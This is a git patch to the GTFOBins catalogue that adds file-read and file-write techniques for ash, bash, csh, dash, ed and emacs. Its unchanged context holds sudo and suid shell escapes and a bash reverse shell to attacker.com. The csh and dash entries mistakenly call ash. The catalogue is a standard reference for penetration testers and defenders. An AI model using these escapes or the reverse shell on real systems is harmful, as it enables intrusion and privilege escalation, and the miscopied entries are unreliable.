From 66b617c9552ed5473eadcdedb7d02a61a57ca01d Mon Sep 17 00:00:00 2001
From: Emilio Pinna <emilio.pinn@gmail.com>
Date: Mon, 28 May 2018 18:09:16 +0100
Subject: [PATCH] Add read/write for ash, bash, csh, dash, ed, and emacs

---
 _gtfobins/ash.md   | 4 ++++
 _gtfobins/bash.md  | 9 +++++++++
 _gtfobins/csh.md   | 4 ++++
 _gtfobins/dash.md  | 4 ++++
 _gtfobins/ed.md    | 7 +++++++
 _gtfobins/emacs.md | 7 +++++++
 6 files changed, 35 insertions(+)

diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md
index 8963e7a..eb597b6 100644
--- a/_gtfobins/ash.md
+++ b/_gtfobins/ash.md
@@ -6,4 +6,8 @@ functions:
     - code: sudo ash
   suid-enabled:
     - code: ./ash
+  file-write:
+    - code: |
+        export LFILE=file_to_write
+        ash -c 'echo data > $LFILE'
 ---
diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
index 4eb23cf..f65ca98 100644
--- a/_gtfobins/bash.md
+++ b/_gtfobins/bash.md
@@ -40,4 +40,13 @@ functions:
         export RHOST=attacker.com
         export RPORT=12345
         bash -c 'bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1'
+  file-read: 
+    - description: It trims trailing newlines.
+      code: |
+        export LFILE=file_to_read
+        bash -c 'echo "$(<$LFILE)"'
+    - description: It trims trailing newlines.
+      code: |
+        export LFILE=file_to_read
+        bash -c $'read -d \x04 a < "$LFILE"; echo "$a"'
 ---
diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md
index a112601..aa5b1e3 100644
--- a/_gtfobins/csh.md
+++ b/_gtfobins/csh.md
@@ -6,4 +6,8 @@ functions:
     - code: sudo csh
   suid-enabled:
     - code: ./csh -b
+  file-write:
+    - code: |
+        export LFILE=file_to_write
+        ash -c 'echo data > $LFILE'
 ---
diff --git a/_gtfobins/dash.md b/_gtfobins/dash.md
index 8b93d4d..0e61b02 100644
--- a/_gtfobins/dash.md
+++ b/_gtfobins/dash.md
@@ -6,4 +6,8 @@ functions:
     - code: sudo dash
   suid-enabled:
     - code: ./dash -p
+  file-write:
+    - code: |
+        export LFILE=file_to_write
+        ash -c 'echo data > $LFILE'
 ---
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
index b85d737..a8d2d56 100644
--- a/_gtfobins/ed.md
+++ b/_gtfobins/ed.md
@@ -12,4 +12,11 @@ functions:
     - code: |-
         ./ed
         !/bin/sh
+  file-read: 
+    - code: |
+        ed file_to_read
+  file-write: 
+    - code: |
+        ed file_to_write
+        w
 ---
diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md
index b8bc630..9dc17e0 100644
--- a/_gtfobins/emacs.md
+++ b/_gtfobins/emacs.md
@@ -6,4 +6,11 @@ functions:
     - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
   suid-enabled:
     - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
+  file-read: 
+    - code: |
+        emacs file_to_read
+  file-write: 
+    - code: |
+        emacs file_to_write
+        C-x C-s
 ---